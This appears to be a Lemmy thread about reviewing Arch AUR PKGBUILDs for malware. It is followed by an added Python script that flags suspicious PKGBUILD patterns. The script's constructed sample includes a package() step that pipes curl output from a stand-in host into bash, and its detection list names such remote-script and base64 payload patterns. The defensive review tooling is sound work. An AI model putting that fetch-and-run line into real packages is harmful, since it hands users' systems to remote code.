TheTwelveYearOld@lemmy.world to linuxmemes@lemmy.world · 1 day ago
Personally I'm grateful to not need 3rd party packages

Technus@lemmy.zip · 1 day ago
Does anyone else manually review PKGBUILDs before installing or upgrading anything from the AUR?

JackbyDev@programming.dev · 15 hours ago
Sort of, but I don’t know what I’m looking for. It would be nice if folks explained what a bad one looks like.

prole@lemmy.blahaj.zone · 15 hours ago (edited)
Look for comments that say “# THIS IS MALWARE”

tomkatt@lemmy.world · 1 day ago (edited)
I do, but not as closely or as often as I should. Recent malware is a reminder to be careful; I think I was starting to take the AUR for granted as a repo when really it’s still the Wild West.

Overspark@feddit.nl · 20 hours ago
Yeah, paru makes it pretty easy to do, and can also build packages in a chroot, adding some extra security.

nesc@lemmy.cafe · 20 hours ago
I do, although most AUR helpers skip reviewing or make it a chore.

0xD@infosec.pub · 18 hours ago
Also with paru. I mainly check that the download shows the correct URL and does standard stuff with it.

Avicenna@lemmy.world · 17 hours ago
At the risk of getting downvoted, I wonder if an LLM would spot it.

Ŝan@piefed.zip · 18 hours ago
I keep hearing people say ðis like it’s a defense against malware and supply chain attacks. Reviewing PKGBUILDs only protects against dumb laziness on ðe part of ðe attacker, like ðey just install a stupidly obvious binary called “virus”. What are you checking for in ðe PKGBUILD?
Yes, always!
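A worked version of the review that 0xD describes (does the download come from the expected URL?) and an answer to JackbyDev's question of what a suspicious PKGBUILD looks like, added here as an example; it is not code from the thread, from paru or from makepkg. It scans the PKGBUILD text without ever sourcing it and flags sources fetched from hosts other than the one in `url=`, `SKIP` checksums, and a few build-step patterns; the heuristics, the `trusted_hosts` parameter and the `SUSPECT` sample (including the host `paste.example.net`) are my own constructions, not taken from any real package or incident.

```python
import re
from urllib.parse import urlparse

# Review heuristics (my own, not a paru or makepkg feature): patterns that
# deserve a closer look when they appear in a PKGBUILD's shell functions.
SUSPICIOUS = [
    (r"(curl|wget)[^\n|]*\|\s*(ba)?sh\b", "remote script piped straight into a shell"),
    (r"base64\s+(-d|--decode)\b", "base64-decoded payload"),
    (r"\b(eval|sudo)\b", "eval or sudo inside build steps"),
    (r"(\$HOME\b|~/|/home/)", "touches the user's home directory instead of $pkgdir"),
]

def _array(name, text):
    """Quoted entries of a bash array such as source=(...), read textually; the PKGBUILD is never sourced."""
    m = re.search(rf"^\s*{name}=\((.*?)\)", text, re.S | re.M)
    return re.findall(r"""["']([^"']+)["']""", m.group(1)) if m else []

def review_pkgbuild(text, trusted_hosts=()):
    """Return a list of (severity, message) findings for the given PKGBUILD text."""
    findings = []
    url = re.search(r"^url=['\"]?([^'\"\n]+)", text, re.M)
    allowed = {h for h in (*trusted_hosts, url and urlparse(url.group(1)).hostname) if h}
    for src in _array("source", text):
        src = src.split("::", 1)[-1]          # drop the optional "filename::" prefix
        if "://" not in src:
            continue                          # local file shipped alongside the PKGBUILD
        host = urlparse(src.split("#", 1)[0]).hostname
        if host not in allowed:
            findings.append(("high", f"source fetched from {host}, not from trusted hosts {sorted(allowed)}"))
    for algo in ("md5", "sha1", "sha256", "b2"):
        if "SKIP" in _array(f"{algo}sums", text):
            findings.append(("medium", f"{algo}sums contains SKIP, so the download is not pinned"))
    for pattern, why in SUSPICIOUS:
        if re.search(pattern, text, re.M):
            findings.append(("high", why))
    return findings

# Constructed sample, not a real AUR package: one source comes from a host other
# than the upstream url, its checksum is SKIP, and package() runs a remote script.
SUSPECT = """url="https://github.com/example/foo"
source=("https://github.com/example/foo/archive/v1.tar.gz"
        "helper.sh::https://paste.example.net/raw/abc")
sha256sums=('0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef' 'SKIP')
package() {
  curl -fsSL https://paste.example.net/raw/abc | bash
}
"""

if __name__ == "__main__":
    print(*review_pkgbuild(SUSPECT), sep="\n")
```

A clean result only means none of these heuristics fired; the build() and package() bodies still need to be read, which is what the chroot build Overspark mentions limits the damage of, not replaces.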